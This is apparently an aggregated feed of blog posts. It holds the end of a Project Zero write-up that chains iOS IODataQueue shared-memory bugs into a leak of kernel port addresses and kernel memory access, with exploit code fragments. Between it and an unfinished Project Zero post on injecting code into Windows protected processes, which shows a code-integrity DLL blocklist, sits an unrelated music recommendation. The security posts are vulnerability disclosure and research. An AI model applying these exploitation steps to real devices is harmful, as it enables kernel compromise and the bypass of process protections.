class IODataQueue : public OSObject{  OSDeclareDefaultStructors(IODataQueue)protected:  IODataQueueMemory * dataQueue;  void * notifyMsg;public:  static IODataQueue *withCapacity(UInt32 size);  static IODataQueue *withEntries(UInt32 numEntries, UInt32 entrySize);  virtual Boolean initWithCapacity(UInt32 size);  virtual Boolean initWithEntries(UInt32 numEntries, UInt32 entrySize);  virtual Boolean enqueue(void *data, UInt32 dataSize);  virtual void setNotificationPort(mach_port_t port);  virtual IOMemoryDescriptor *getMemoryDescriptor();};
Here's the entire implementation of IODataQueue, as it was around iOS 7.1.2:
OSDefineMetaClassAndStructors(IODataQueue, OSObject)
IODataQueue *IODataQueue::withCapacity(UInt32 size){    IODataQueue *dataQueue = new IODataQueue;
   if (dataQueue) {        if (!dataQueue->initWithCapacity(size)) {            dataQueue->release();            dataQueue = 0;        }    }
   return dataQueue;}
IODataQueue *IODataQueue::withEntries(UInt32 numEntries, UInt32 entrySize){    IODataQueue *dataQueue = new IODataQueue;
   if (dataQueue) {        if (!dataQueue->initWithEntries(numEntries, entrySize)) {            dataQueue->release();            dataQueue = 0;        }    }
   return dataQueue;}
Boolean IODataQueue::initWithCapacity(UInt32 size){    vm_size_t allocSize = 0;
   if (!super::init()) {        return false;    }
   allocSize = round_page(size + DATA_QUEUE_MEMORY_HEADER_SIZE);
   if (allocSize < size) {        return false;    }
   dataQueue = (IODataQueueMemory *)IOMallocAligned(allocSize, PAGE_SIZE);    if (dataQueue == 0) {        return false;    }
   dataQueue->queueSize    = size;    dataQueue->head         = 0;    dataQueue->tail         = 0;
   return true;}
Boolean IODataQueue::initWithEntries(UInt32 numEntries, UInt32 entrySize){    return (initWithCapacity((numEntries + 1) * (DATA_QUEUE_ENTRY_HEADER_SIZE + entrySize)));}
void IODataQueue::free(){    if (dataQueue) {        IOFreeAligned(dataQueue, round_page(dataQueue->queueSize + DATA_QUEUE_MEMORY_HEADER_SIZE));    }
Boolean IODataQueue::enqueue(void * data, UInt32 dataSize){    const UInt32       head = dataQueue->head;  // volatile    const UInt32       tail = dataQueue->tail;    const UInt32       entrySize = dataSize + DATA_QUEUE_ENTRY_HEADER_SIZE;    IODataQueueEntry * entry;
   if ( tail >= head )    {        // Is there enough room at the end for the entry?        if ( (tail + entrySize) <= dataQueue->queueSize )        {            entry = (IODataQueueEntry *)((UInt8 *)dataQueue->queue + tail);
           entry->size = dataSize;            memcpy(&entry->data, data, dataSize);
           // The tail can be out of bound when the size of the new entry            // exactly matches the available space at the end of the queue.            // The tail can range from 0 to dataQueue->queueSize inclusive.
           dataQueue->tail += entrySize;        }        else if ( head > entrySize ) // Is there enough room at the beginning?        {            // Wrap around to the beginning, but do not allow the tail to catch            // up to the head.
           dataQueue->queue->size = dataSize;
           // We need to make sure that there is enough room to set the size before            // doing this. The user client checks for this and will look for the size            // at the beginning if there isn't room for it at the end.
           if ( ( dataQueue->queueSize - tail ) >= DATA_QUEUE_ENTRY_HEADER_SIZE )            {                ((IODataQueueEntry *)((UInt8 *)dataQueue->queue + tail))->size = dataSize;            }
           memcpy(&dataQueue->queue->data, data, dataSize);            dataQueue->tail = entrySize;        }        else        {            return false; // queue is full        }    }    else    {        // Do not allow the tail to catch up to the head when the queue is full.        // That's why the comparison uses a '>' rather than '>='.
       if ( (head - tail) > entrySize )        {            entry = (IODataQueueEntry *)((UInt8 *)dataQueue->queue + tail);
           entry->size = dataSize;            memcpy(&entry->data, data, dataSize);            dataQueue->tail += entrySize;        }        else        {            return false; // queue is full        }    }
   // Send notification (via mach message) that data is available.
   if ( ( head == tail )                /* queue was empty prior to enqueue() */    || ( dataQueue->head == tail ) )   /* queue was emptied during enqueue() */    {        sendDataAvailableNotification();    }
   return true;}
void IODataQueue::setNotificationPort(mach_port_t port){    static struct _notifyMsg init_msg = { {        MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0),        sizeof (struct _notifyMsg),        MACH_PORT_NULL,        MACH_PORT_NULL,        0,        0    } };
   if (notifyMsg == 0) {        notifyMsg = IOMalloc(sizeof(struct _notifyMsg));    }
   *((struct _notifyMsg *)notifyMsg) = init_msg;
   ((struct _notifyMsg *)notifyMsg)->h.msgh_remote_port = port;}
void IODataQueue::sendDataAvailableNotification(){    kern_return_t kr;    mach_msg_header_t * msgh;
   msgh = (mach_msg_header_t *)notifyMsg;    if (msgh && msgh->msgh_remote_port) {        kr = mach_msg_send_from_kernel_proper(msgh, msgh->msgh_size);        switch(kr) {            case MACH_SEND_TIMED_OUT: // Notification already sent            case MACH_MSG_SUCCESS:                break;            default:                IOLog("%s: dataAvailableNotification failed - msg_send returned: %d\n", /*getName()*/"IODataQueue", kr);                break;        }    }}
IOMemoryDescriptor *IODataQueue::getMemoryDescriptor(){    IOMemoryDescriptor *descriptor = 0;
   if (dataQueue != 0) {        descriptor = IOMemoryDescriptor::withAddress(dataQueue, dataQueue->queueSize + DATA_QUEUE_MEMORY_HEADER_SIZE, kIODirectionOutIn);    }
   return descriptor;}
The ::initWithCapacity method allocates the buffer which will end up in shared memory. We can see from the cast that the structure of the memory looks like this:
typedef struct _IODataQueueMemory {    UInt32            queueSize;    volatile UInt32   head;    volatile UInt32   tail;    IODataQueueEntry  queue[1];} IODataQueueMemory;
The ::setNotificationPort method allocated a mach message header structure via IOMalloc when it was first called and stored the buffer as notifyMsg.
The ::enqueue method was responsible for writing data into the next free slot in the queue, potentially wrapping back around to the beginning of the buffer.
Finally, ::getMemoryDescriptor created an IOMemoryDescriptor object which wrapped the dataQueue memory to return to userspace.
IODataQueue.cpp was 243 lines, including license and comments. I count at least 6 bugs, which I've highlighted in the code. There's only one integer overflow check but there are multiple obvious integer overflow issues. The other problems stemmed from the fact that the only place where the IODataQueue was storing the queue's length was in the shared memory which userspace could modify.
This lead to obvious memory corruption issues in ::enqueue since userspace could alter the queueSize, head and tail fields and the kernel had no way to verify whether they were within the bounds of the queue buffer. The other two uses of the queueSize field also yielded interesting bugs: The ::free method has to trust the queueSize field, and so will make an oversized IOFree. Most interesting of all however is ::getMemoryDescriptor, which trusts queueSize when creating the IOMemoryDescriptor. If the kernel code which was using the IODataQueue allowed userspace to get multiple memory descriptors this would have let us get an oversized memory descriptor, potentially giving us read/write access to other kernel heap objects.
Back to PanguPangu's kernel code exec bug isn't in IODataQueue but in the subclass IOSharedDataQueue. IOSharedDataQueue.h tells us that the "IOSharedDataQueue class is designed to also allow a user process to queue data to kernel code."
IOSharedDataQueue adds one (unused) field:
   struct ExpansionData {    };    /*! @var reserved        Reserved for future use.  (Internal use only) */    ExpansionData * _reserved;

IOSharedDataQueue doesn't override the ::enqueue method, but adds a ::dequeue method to allow the kernel to dequeue objects which userspace has enqueued.
::dequeue had the same problems as ::enqueue with the queue size being in shared memory, which could lead the kernel to read out of bounds. But strangely that wasn't the only change in IOSharedDataQueue. Pangu noticed that IOSharedDataQueue also had a much more curious change in its overridden version of ::initWithCapacity:
Boolean IOSharedDataQueue::initWithCapacity(UInt32 size){    IODataQueueAppendix *   appendix;        if (!super::init()) {        return false;    }        dataQueue = (IODataQueueMemory *)IOMallocAligned(round_page(size + DATA_QUEUE_MEMORY_HEADER_SIZE + DATA_QUEUE_MEMORY_APPENDIX_SIZE), PAGE_SIZE);    if (dataQueue == 0) {        return false;    }
   dataQueue->queueSize = size;    dataQueue->head = 0;    dataQueue->tail = 0;        appendix = (IODataQueueAppendix *)((UInt8 *)dataQueue + size + DATA_QUEUE_MEMORY_HEADER_SIZE);    appendix->version = 0;    notifyMsg = &(appendix->msgh);    setNotificationPort(MACH_PORT_NULL);
   return true;}
IOSharedDataQueue increased the size of the shared memory buffer to also add space for an IODataQueueAppendix structure:
typedef struct _IODataQueueAppendix {    UInt32 version;    mach_msg_header_t msgh;} IODataQueueAppendix;
This contains a version field and, strangely, a mach message header. Then on this line:
 notifyMsg = &(appendix->msgh);
the notifyMsg member of the IODataQueue superclass is set to point in to that appendix structure.
Recall that IODataQueue allocated a mach message header structure via IOMalloc when a notification port was first set, so why did IOSharedDataQueue do it differently? About the only plausible explanation I can come up with is that a developer had noticed that the dataQueue memory allocation typically wasted almost a page of memory, because clients asked for a page-multiple number of bytes, then the queue allocation added a small header to that and rounded up to a page-multiple again. This change allowed you to save a single 0x18 byte kernel allocation per queue. Given that this change seems to have landed right around the launch date of the first iPhone, a memory constrained device with no swap, I could imagine there was a big drive to save memory.
But the question is: can you put a mach message header in shared memory like that?
What's in a message?Here's the definition of mach_msg_header_t, as it was in iOS 7.1.2:
typedef struct {  mach_msg_bits_t  msgh_bits;  mach_msg_size_t  msgh_size;  mach_port_t      msgh_remote_port;  mach_port_t      msgh_local_port;  mach_msg_size_t  msgh_reserved;  mach_msg_id_t    msgh_id;} mach_msg_header_t;
(The msgh_reserved field has since become msgh_voucher_port with the introduction of vouchers.)
Both userspace and the kernel appear at first glance to have the same definition of this structure, but upon closer inspection if you resolve all the typedefs you'll see this very important distinction:
userspace:typedef __darwin_mach_port_t mach_port_t;typedef __darwin_mach_port_name_t __darwin_mach_port_t;typedef __darwin_natural_t __darwin_mach_port_name_t; typedef unsigned int __darwin_natural_t
kernel:typedef ipc_port_t mach_port_t;typedef struct ipc_port *ipc_port_t;
In userspace mach_port_t is an unsigned 32-bit integer which is a task-local name for a port, but in the kernel a mach_port_t is a raw pointer to the underlying ipc_port structure.
Since the kernel is the one responsible for initializing the notification message, and is the one sending it, it seems that the kernel is writing kernel pointers into userspace shared memory!
Fast-forwardBefore we move on to writing a new exploit for that old issue let's jump forward to 2018, and why exactly I'm looking at this old code again.
I've recently spoken publicly about the importance of variant analysis, and I thought it was important to actually do some variant analysis myself before I gave that talk. By variant analysis, I mean taking a known security bug and looking for code which is vulnerable in a similar way. That could mean searching a codebase for all uses of a particular API which has exploitable edge cases, or even just searching for a buggy code snippet which has been copy/pasted into a different file.
Userspace queues and deja-xnuThis summer while looking for variants of the old IODataQueue issues I saw something I hadn't noticed before: as well as the facilities for enqueuing and dequeue objects to and from kernel-owned IODataQueues, the userspace IOKit.framework also contains code for creating userspace-owned queues, for use only between userspace processes.
The code for creating these queues isn't in the open-source IOKitUser package; you can only see this functionality by reversing the IOKit framework binary.
There are no users of this code in the IOKitUser source, but some reversing showed that the userspace-only queues were used by the com.apple.iohideventsystem MIG service, implemented in IOKit.framework and hosted by backboardd on iOS and hidd on MacOS. You can talk to this service from inside the app sandbox on iOS.
Reading the userspace __IODataQueueEnqueue method, which is used to enqueue objects into both userspace and kernel queues, I had a strong feeling of deja-xnu: It was trusting the queueSize value in the queue header in shared memory, just like CVE-2014-4418 from 2014 did. Of course, if the kernel is the other end of the queue then this isn't interesting (since the kernel doesn't trust these values) but we now know that there are userspace only queues, where the other end is another userspace process.
Reading more of the userspace IODataQueue handling code I noticed that unlike the kernel IODataQueue object, the userspace one had an appendix as well as header. And in that appendix, like IOSharedDataQueue, it stored a mach message header! Did this userspace IODataQueue have the same issue as the IOSharedDataQueue issue from Pangu 7/8? Let's look at the code:
IOReturn IODataQueueSetNotificationPort(IODataQueueMemory *dataQueue, mach_port_t notifyPort){    IODataQueueAppendix * appendix = NULL;    UInt32 queueSize = 0;                if ( !dataQueue )        return kIOReturnBadArgument;            queueSize = dataQueue->queueSize;        appendix = (IODataQueueAppendix *)((UInt8 *)dataQueue + queueSize + DATA_QUEUE_MEMORY_HEADER_SIZE);
   appendix->msgh.msgh_bits        = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0);    appendix->msgh.msgh_size        = sizeof(appendix->msgh);    appendix->msgh.msgh_remote_port = notifyPort;    appendix->msgh.msgh_local_port  = MACH_PORT_NULL;    appendix->msgh.msgh_id          = 0;
   return kIOReturnSuccess;}
We can take a look in lldb at the contents of the buffer and see that at the end of the queue, still in shared memory, we can see a mach message header, where the name field is the remote end's name for the notification port we provided!
Exploitation of an arbitrary mach message sendIn XNU each task (process) has a task port, and each thread within a task has a thread port. Originally a send right to a task's task port gave full memory and thread control, and a send right to a thread port meant full thread control (which is of course also full memory control.)
As a result of the exploits which I and others have released abusing issues with mach ports to steal port rights Apple have very slowly been hardening these interfaces. But as of iOS 11.4.1 if you have a send right to a thread port belonging to another task you can still use it to manipulate the register state of that thread.
Interestingly process startup on iOS is sufficiently deterministic that in backboardd on iOS 7.1.2 on an iPhone 4 right up to iOS 11.4.1 on an iPhone SE, 0x407 names a thread port.
Stealing portsThe msgh_local_port field in a mach message is typically used to give the recipient of a message a send-once right to a "reply port" which can be used to send a reply. This is just a convention and any send or send-once right can be transferred here. So by rewriting the mach message in shared memory which will be sent to us to set the msgh_local_port field to 0x407 (backboardd's name for a thread port) and the msgh_bits field to use a COPY_SEND disposition for the local port, when the notification message is sent to us by backboardd we'll receive a send right to a backboardd thread port!
This exploit for this issue targets iOS 11.4.1, and contains a modified version of the remote_call code from triple_fetch to work with a stolen thread port rather than a task port.
Back to 2014I mentioned that Apple have slowly been adding mitigations against the use of stolen task ports. The first of these mitigations I'm aware of was to prevent userspace using the kernel task port, often known as task-for-pid-0 or TFP0, which is the task port representing the kernel task (and hence allowing read/write access to kernel memory). I believe this was done in response to my mach_portal exploit which used a kernel use-after-free to steal a send right to the kernel task port.
Prior to that hardening, if you had a send right to the kernel task port you had complete read/write access to kernel memory.
We've seen that port name allocation is extremely stable, with the same name for a thread port for four years. Is the situation similar for the ipc_port pointers used in the kernel in mach messages?
Very early kernel port allocation is also deterministic. I abused this in mach_portal to steal the kernel task port by first determining the address of the host port then guessing that the kernel task port must be nearby since they're both very early port allocations.
Back in 2014 things were even easier because the kernel task port was at a fixed offset from the host port; all we need to do is leak the address of the host port then we can compute the address of the kernel task port!
Determining port addressesIOHIDEventService is a userclient which exposes an IOSharedDataQueue to userspace. We can't open this from inside the app sandbox, but the exploit for the userspace IODataQueue bug was easy enough to backport to 32-bit iOS 7.1.2, and we can open an IOHIDEventService userclient from backboardd.
The sandbox only prevents us from actually opening the userclient connection. We can then transfer the mach port representing this connection back to our sandboxed app and continue the exploit from there. Using the code I wrote for triple_fetch we can easily use backboardd's task port which we stole (using the userspace IODataQueue bug) to open an IOKit userclient connection and move it back:
uint32_t remote_matching =  task_remote_call(bbd_task_port,                   IOServiceMatching,                   1,                   REMOTE_CSTRING("IOHIDEventService"));  uint32_t remote_service =  task_remote_call(bbd_task_port,                   IOServiceGetMatchingService,                   2,                   REMOTE_LITERAL(0),                   REMOTE_LITERAL(remote_matching));  uint32_t remote_conn = 0;uint32_t remote_err =  task_remote_call(bbd_task_port,                   IOServiceOpen,                   4,                   REMOTE_LITERAL(remote_service),                   REMOTE_LITERAL(0x1307), // remote mach_task_self()                   REMOTE_LITERAL(0),                   REMOTE_OUT_BUFFER(&remote_conn,                                     sizeof(remote_conn)));  mach_port_t conn =  pull_remote_port(bbd_task_port,                   remote_conn,                   MACH_MSG_TYPE_COPY_SEND);
We then just need to call external method 0 to "open" the queue and IOConnectMapMemory to map the queue shared memory into our process and find the mach message header:
vm_address_t qaddr = 0;vm_size_t qsize = 0;
IOConnectMapMemory(conn,                   0,                   mach_task_self(),                   &qaddr,                   &qsize,                   1);
mach_msg_header_t* shm_msg =  (mach_msg_header_t*)(qaddr + qsize - 0x18);
In order to set the queue's notification port we need to call IOConnectSetNotificationPort on the userclient:
mach_port_t notification_port = MACH_PORT_NULL;mach_port_allocate(mach_task_self(),                   MACH_PORT_RIGHT_RECEIVE,                   &notification_port);
uint64_t ref[8] = {0};IOConnectSetNotificationPort(conn,                             0,                             notification_port,                             ref);
We can then see the kernel address of that port's ipc_port in the shared memory message:
+0x00001010 00000013  // msgh_bits+0x00001014 00000018  // msgh_size+0x00001018 99a3e310  // msgh_remote_port+0x0000101c 00000000  // msgh_local_port+0x00001020 00000000  // msgh_reserved+0x00001024 00000000  // msgh_id

We now need to determine the heap address of an early kernel port. If we just call IOConnectSetNotificationPort with a send right to the host_self port, we get an error:
IOConnectSetNotificationPort error: 1000000a (ipc/send) invalid port right
This error is actually from the MIG client code telling us that the MIG serialized message failed to send. IOConnectSetNotificationPort is a thin wrapper around the MIG generated io_conenct_set_notification_port client code. Let's take a look in device.defs which is the source file used by MIG to generate the RPC stubs for IOKit:
routine io_connect_set_notification_port(    connection        : io_connect_t; in notification_type : uint32_t; in port              : mach_port_make_send_t; in reference         : uint32_t);
Here we can see that the port argument is defined as a mach_port_make_send_t which means that the MIG code will send the port argument in a port descriptor with a disposition of MACH_MSG_TYPE_MAKE_SEND, which requires the sender to hold a receive right. But in mach there is no way for the receiver to determine whether the sender held a receive right for a send right which you received or instead sent you a copy via MACH_MSG_TYPE_COPY_SEND. This means that all we need to do is modify the MIG client code to use a COPY_SEND disposition and then we can set the queue's notification port to any send right we can acquire, irrespective of whether we hold a receive right.
Doing this and passing the name we get from mach_host_self() we can learn the host port's kernel address:
host port: 0x8e30cee0
Leaking a couple of early ports which are likely to come from the same memory page and finding the greatest common factor gives us a good guess for the size of an ipc_port_t in this version of iOS:
master port: 0x8e30c690host port: 0x8e30cee0GCF(0x690, 0xee0) = 0x70
Looking at the XNU source we can see that the host port is allocated before the kernel task port, and since this was before the zone allocator freelist randomisation mitigation was introduced this means that the address of the kernel task port will be somewhere below the host port.
By setting the msgh_local_port field to the address of the host port - 0x70, then decrementing it by 0x70 each time we receive a notification message we will be sent a different early port each time a notification message is sent. Doing this we learn that the kernel task port is allocated 5 ports after the host port, meaning that the address of the kernel task port is host_port_kaddr - (5*0x70).
Putting it all togetherYou can get my exploit for iOS 7.1.2 here, I've only tested it on an iPhone 4. You'll need to use an old version of XCode to build and run it; I'm using XCode 7.3.1.
Launch the app, press the home button to trigger an HID notification message and enjoy read/write access to kernel memory. :)
In 2014 then it seems that with enough OS internals knowledge and the right set of bugs it was pretty easy to build a logic bug chain to get kernel memory read write. Things have certainly changed since then, but I'd be interested to compare this post with another one in 2022 looking back to 2018.
LessonsVariant analysis is really important, but attackers are the only parties incentivized to do a good job of it. Why did the userspace variant of this IODataQueue issue persist for four more years after almost the exact same bug was fixed in the kernel code?
Let's also not underplay the impact that just the userspace version of the bug alone could have had. Prior to mach_portal, due to a design quirk of the com.apple.iohideventsystem MIG service backboardd had send rights to a large number of other process's task ports, meaning that a compromise of backboardd was also a compromise of those tasks.
Some of those tasks ran as root meaning they could have exploited the processor_set_tasks vulnerability to get the task ports for any task on the device, which despite being a known issue also wasn't fixed until I exploited it in triple_fetch.
This IODataQueue issue wasn't the only variant I found as part of this project; the deja-xnu project for iOS 11.4.1 also contains PoC code to trigger a MIG code generation bug in clients of backboardd, and the project zero tracker has details of further issues.
A final note on security bulletinsYou'll notice that none of the issues I've linked above are mentioned in the iOS 12 security bulletin, despite being fixed in that release. Apple are still yet to assign CVEs for these issues or publicly acknowledge that they were fixed in iOS 12. In my opinion a security bulletin should mention the security bugs that were fixed. Not doing so provides a disincentive for people to update their devices since it appears that there were fewer security fixes that there really were.
Categories: Security

Recommendation: Hollywood Africans by Jon Batiste

iPhone J.D. - Wed, 10/17/2018 - 01:12

I don't talk about music very much on iPhone J.D., but if you are looking for something truly amazing to listen to on your iPhone and you enjoy the piano, I strongly recommend that you check out the newest album by Jon Batiste called Hollywood Africans.  Although Jon Batiste has been playing music his entire life — he comes from a big music family in New Orleans — I suspect that most folks simply know him as the bandleader on The Late Show with Stephen Colbert.  But he is far from simply a TV personality; he is a seriously talented musician, and I often find my jaw dropping as I watch him play the piano. 

Before listening to the album, I recommend that you listen to the first 20 minutes of a great recent episode of NPR's Fresh Air podcast, in which Batiste sits down at a piano with Terry Gross, plays parts of some of the songs on the album, and explains what motivated him to create this album.  Click here to listen on the NPR website, or if you use the Overcast app to listen to podcasts, here is a direct link. Using just my Apple Watch Series 4 and my AirPods, I enjoyed listening to that episode last night during an outdoor walk.  As I used my Apple Watch to listen to Jon Batiste, I remembered that he was actually featured in a 15 second ad for the Apple Watch in early 2016; the link in my In the news post from back then no longer works, but you can still watch the video on YouTube at this link.

As for the album itself, every song is great, but I'll just mention the first two.  The first song is Kenner Boogie (Apple Music link), an original piano song that that will make you tap your toes and smile, all the while wondering how one person can play all of those piano keys so quickly with just two hands.  The second song is What a Wonderful World (Apple Music link), a song first recorded by Louis Armstrong in 1967.  That song has been performed and interpreted countless times, but I've never heard an arrangement anything like this.  Incredibly beautiful and moving.

I've seen Jon Batiste perform several times, and the first time I saw him was on May 1, 2005 at Jazz Fest in New Orleans, back when he was a teenager studying at Juilliard.  I only know the date because I was so impressed by his performance that I bought his first album, Times in New Orleans (Apple Music link), and my wife took the picture at the right of me doing so.  He was good back then; he is fantastic today.

Click here to listen to Hollywood Africans on Apple Music

Click here to get Hollywood Africans on Amazon

Categories: iPhone Web Sites

Injecting Code into Windows Protected Processes using COM - Part 1

Google Project Zero - Tue, 10/16/2018 - 12:34
Posted by James Forshaw, Google Project Zero
At Recon Montreal 2018 I presented “Unknown Known DLLs and other Code Integrity Trust Violations” with Alex Ionescu. We described the implementation of Microsoft Windows’ Code Integrity mechanisms and how Microsoft implemented Protected Processes (PP). As part of that I demonstrated various ways of bypassing Protected Process Light (PPL), some requiring administrator privileges, others not.
In this blog I’m going to describe the process I went through to discover a way of injecting code into a PPL on Windows 10 1803. As the only issue Microsoft considered to be violating a defended security boundary has now been fixed I can discuss the exploit in more detail.Background on Windows Protected ProcessesThe origins of the Windows Protected Process (PP) model stretch back to Vista where it was introduced to protect DRM processes. The protected process model was heavily restricted, limiting loaded DLLs to a subset of code installed with the operating system. Also for an executable to be considered eligible to be started protected it must be signed with a specific Microsoft certificate which is embedded in the binary. One protection that the kernel enforced is that a non-protected process couldn’t open a handle to a protected process with enough rights to inject arbitrary code or read memory.
In Windows 8.1 a new mechanism was introduced, Protected Process Light (PPL), which made the protection more generalized. PPL loosened some of the restrictions on what DLLs were considered valid for loading into a protected process and introduced different signing requirements for the main executable. Another big change was the introduction of a set of signing levels to separate out different types of protected processes. A PPL in one level can open for full access any process at the same signing level or below, with a restricted set of access granted to levels above. These signing levels were extended to the old PP model, a PP at one level can open all PP and PPL at the same signing level or below, however the reverse was not true, a PPL can never open a PP at any signing level for full access. Some of the levels and this relationship are shown below:
Signing levels allow Microsoft to open up protected processes to third-parties, although at the current time the only type of protected process that a third party can create is an Anti-Malware PPL. The Anti-Malware level is special as it allows the third party to add additional permitted signing keys by registering an Early Launch Anti-Malware (ELAM) certificate. There is also Microsoft’s TruePlay, which is an Anti-Cheat technology for games which uses components of PPL but it isn’t really important for this discussion.
I could spend a lot of this blog post describing how PP and PPL work under the hood, but I recommend reading the blog post series by Alex Ionescu instead (Parts 1, 2 and 3) which will do a better job. While the blog posts are primarily based on Windows 8.1, most of the concepts haven’t changed substantially in Windows 10.
I’ve written about Protected Processes before [link], in the form of the custom implementation by Oracle in their VirtualBox virtualization platform on Windows. The blog showed how I bypassed the process protection using multiple different techniques. What I didn’t mention at the time was the first technique I described, injecting JScript code into the process, also worked against Microsoft's PPL implementation. I reported that I could inject arbitrary code into a PPL to Microsoft (see Issue 1336) from an abundance of caution in case Microsoft wanted to fix it. In this case Microsoft decided it wouldn’t be fixed as a security bulletin. However Microsoft did fix the issue in the next major release on Windows (version 1803) by adding the following code to CI.DLL, the Kernel’s Code Integrity library:
UNICODE_STRING g_BlockedDllsForPPL[] = {

NTSTATUS CipMitigatePPLBypassThroughInterpreters(PEPROCESS Process,
                                                LPBYTE Image,
                                                SIZE_T ImageSize) {
 if (!PsIsProtectedProcess(Process))

 UNICODE_STRING OriginalImageName;
 // Get the original filename from the image resources.
     Image, ImageSize, &OriginalImageName);
 for(int i = 0; i < _countof(g_BlockedDllsForPPL); ++i) {
   if (RtlEqualUnicodeString(g_BlockedDllsForPPL[i],
                             &OriginalImageName, TRUE)) {
The fix checks the original file name in the resource section of the image being loaded against a blacklist of 5 DLLs. The blacklist includes DLLs such as JSCRIPT.DLL, which implements the original JScript scripting engine, and SCROBJ.DLL, which implements scriptlet objects. If the kernel detects a PP or PPL loading one of these DLLs the image load is rejected with STATUS_DYNAMIC_CODE_BLOCKED. This kills my exploit, if you modify the resource section of one of the listed DLLs the signature of the image will be invalidated resulting in the image load failing due to a cryptographic hash mismatch. It’s actually the same fix that Oracle used to block the attack in VirtualBox, although that was implemented in user-mode.Finding New TargetsThe previous injection technique using script code was a generic technique that worked on any PPL which loaded a COM object. With the technique fixed I decided to go back and look at what executables will load as a PPL to see if they have any obvious vulnerabilities I could exploit to get arbitrary code execution. I could have chosen to go after a full PP, but PPL seemed the easier of the two and I’ve got to start somewhere. There’s so many ways to inject into a PPL if we could just get administrator privileges, the least of which is just loading a kernel driver. For that reason any vulnerability I discover must work from a normal user account. Also I wanted to get the highest signing level I can get, which means PPL at Windows TCB signing level.
The first step was to identify executables which run as a protected process, this gives us the maximum attack surface to analyze for vulnerabilities. Based on the blog posts from Alex it seemed that in order to be loaded as PP or PPL the signing certificate needs a special Object Identifier (OID) in the certificate’s Enhanced Key Usage (EKU) extension. There are separate OID for PP and PPL; we can see this below with a comparison between WERFAULTSECURE.EXE, which can run as PP/PPL, and CSRSS.EXE, which can only run as PPL.

I decided to look for executables which have an embedded signature with these EKU OIDs and that’ll give me a list of all executables to look for exploitable behavior. I wrote the Get-EmbeddedAuthenticodeSignature cmdlet for my NtObjectManager PowerShell module to extract this information.
At this point I realized there was a problem with the approach of relying on the signing certificate, there’s a lot of binaries I expected to be allowed to run as PP or PPL which were missing from the list I generated. As PP was originally designed for DRM there was no obvious executable to handle the Protected Media Path such as AUDIODG.EXE. Also, based on my previous research into Device Guard and Windows 10S, I knew there must be an executable in the .NET framework which could run as PPL to add cached signing level information to NGEN generated binaries (NGEN is an Ahead-of-Time JIT to convert a .NET assembly into native code). The criteria for PP/PPL were more fluid than I expected. Instead of doing static analysis I decided to perform dynamic analysis, just start protected every executable I could enumerate and query the protection level granted. I wrote the following script to test a single executable:
Import-Module NtObjectManager
function Test-ProtectedProcess {    [CmdletBinding()]    param(        [Parameter(Mandatory, ValueFromPipelineByPropertyName)]        [string]$FullName,        [NtApiDotNet.PsProtectedType]$ProtectedType = 0,        [NtApiDotNet.PsProtectedSigner]$ProtectedSigner = 0        )    BEGIN {        $config = New-NtProcessConfig abc -ProcessFlags ProtectedProcess `            -ThreadFlags Suspended -TerminateOnDispose `            -ProtectedType $ProtectedType `            -ProtectedSigner $ProtectedSigner    }
   PROCESS {        $path = Get-NtFilePath $FullName        Write-Host $path        try {            Use-NtObject($p = New-NtProcess $path -Config $config) {                $prot = $p.Process.Protection                $props = @{                    Path=$path;                    Type=$prot.Type;                    Signer=$prot.Signer;                    Level=$prot.Level.ToString("X");                }                $obj = New-Object –TypeName PSObject –Prop $props                Write-Output $obj            }        } catch {        }    }}
When this script is executed a function is defined, Test-ProtectedProcess. The function takes a path to an executable, starts that executable with a specified protection level and checks whether it was successful. If the ProtectedType and ProtectedSigner parameters are 0 then the kernel decides the “best” process level. This leads to some annoying quirks, for example SVCHOST.EXE is explicitly marked as PPL and will run at PPL-Windows level, however as it’s also a signed OS component the kernel will determine its maximum level is PP-Authenticode. Another interesting quirk is using the native process creation APIs it’s possible to start a DLL as main executable image. As a significant number of system DLLs have embedded Microsoft signatures they can also be started as PP-Authenticode, even though this isn’t necessarily that useful. The list of binaries that will run at PPL is shown below along with their maximum signing level.
PathSigning LevelC:\windows\Microsoft.Net\Framework\v4.0.30319\mscorsvw.exeCodeGenC:\windows\Microsoft.Net\Framework64\v4.0.30319\mscorsvw.exeCodeGenC:\windows\system32\SecurityHealthService.exeWindowsC:\windows\system32\svchost.exeWindowsC:\windows\system32\xbgmsvc.exeWindowsC:\windows\system32\csrss.exeWindows TCBC:\windows\system32\services.exeWindows TCBC:\windows\system32\smss.exeWindows TCBC:\windows\system32\werfaultsecure.exeWindows TCBC:\windows\system32\wininit.exeWindows TCBInjecting Arbitrary Code Into NGENAfter carefully reviewing the list of executables which run as PPL I settled on trying to attack the previously mentioned .NET NGEN binary, MSCORSVW.EXE. My rationale for choosing the NGEN binary was:
  • Most of the other binaries are service binaries which might need administrator privileges to start correctly.
  • The binary is likely to be loading complex functionality such as the .NET framework as well as having multiple COM interactions (my go-to technology for weird behavior).
  • In the worst case it might still yield a Device Guard bypass as the reason it runs as PPL is to give it access to the kernel APIs to apply a cached signing level. Any bug in the operation of this binary might be exploitable even if we can’t get arbitrary code running in a PPL.

But there is an issue with the NGEN binary, specifically it doesn’t meet my own criteria that I get the top signing level, Windows TCB. However, I knew that when Microsoft fixed Issue 1332 they left in a back door where a writable handle could be maintained during the signing process if the calling process is PPL as shown below:
NTSTATUS CiSetFileCache(HANDLE Handle, ...) {

 ObReferenceObjectByHandle(Handle, &FileObject);

 if (FileObject->SharedWrite ||
    (FileObject->WriteAccess &&
     PsGetProcessProtection().Type != PROTECTED_LIGHT)) {

 // Continue setting file cache.
If I could get code execution inside the NGEN binary I could reuse this backdoor to cache sign an arbitrary file which will load into any PPL. I could then DLL hijack a full PPL-WindowsTCB process to reach my goal.
To begin the investigation we need to determine how to use the MSCORSVW executable. Using MSCORSVW is not documented anywhere by Microsoft, so we’ll have to do a bit of digging. First off, this binary is not supposed to be run directly, instead it’s invoked by NGEN when creating an NGEN’ed binary. Therefore, we can run the NGEN binary and use a tool such as Process Monitor to capture what command line is being used for the MSCORSVW process. Executing the command:
C:\> NGEN install c:\some\binary.dll
Results in the following command line being executed:
MSCORSVW -StartupEvent A -InterruptEvent B -NGENProcess C -Pipe D
A, B, C and D are handles which NGEN ensures are inherited into the new process before it starts. As we don’t see any of the original NGEN command line parameters it seems likely they’re being passed over an IPC mechanism. The “Pipe” parameter gives an indication that  named pipes are used for IPC. Digging into the code in MSCORSVW, we find the method NGenWorkerEmbedding, which looks like the following:
void NGenWorkerEmbedding(HANDLE hPipe) {
